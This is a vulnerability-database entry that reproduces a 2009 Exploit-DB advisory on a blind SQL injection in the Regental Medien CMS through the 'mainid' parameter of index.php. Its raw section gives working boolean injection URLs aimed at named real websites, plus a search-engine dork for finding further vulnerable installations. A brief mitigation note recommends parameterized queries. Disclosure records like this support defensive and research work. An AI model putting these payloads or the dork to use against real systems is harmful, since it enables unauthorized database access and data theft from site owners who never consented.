Regental Medien Blind SQL Injection Vulnerability

vendor:

Regental Medien

by:

NoGe

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Regental Medien

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Regental Medien Blind SQL Injection Vulnerability

Regental Medien is vulnerable to Blind SQL Injection. The vulnerable file is index.php. The exploit can be executed by sending a malicious SQL query to the vulnerable parameter mainid. Proof of concept can be seen in the given example. The dork for this vulnerability is 'powered by regental medien'.

Mitigation:

Input validation should be done to prevent SQL injection attacks. Sanitize user input and use parameterized queries.

Source

Exploit-DB raw data:

[o] Regental Medien Blind SQL Injection Vulnerability
Software : Regental Medien
Vendor   : http://www.regental-medien.de/
Author   : NoGe
Home     : http://antisecurity.org

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?mainid=[SQL]

[o] Proof of Concept
http://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=4 << TRUE
http://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=5 << FALSE
http://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=4 << TRUE
http://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=5 << FALSE

[o] Dork
"powered by regental medien"

[o] Note
this is a private script
all target are in one IP address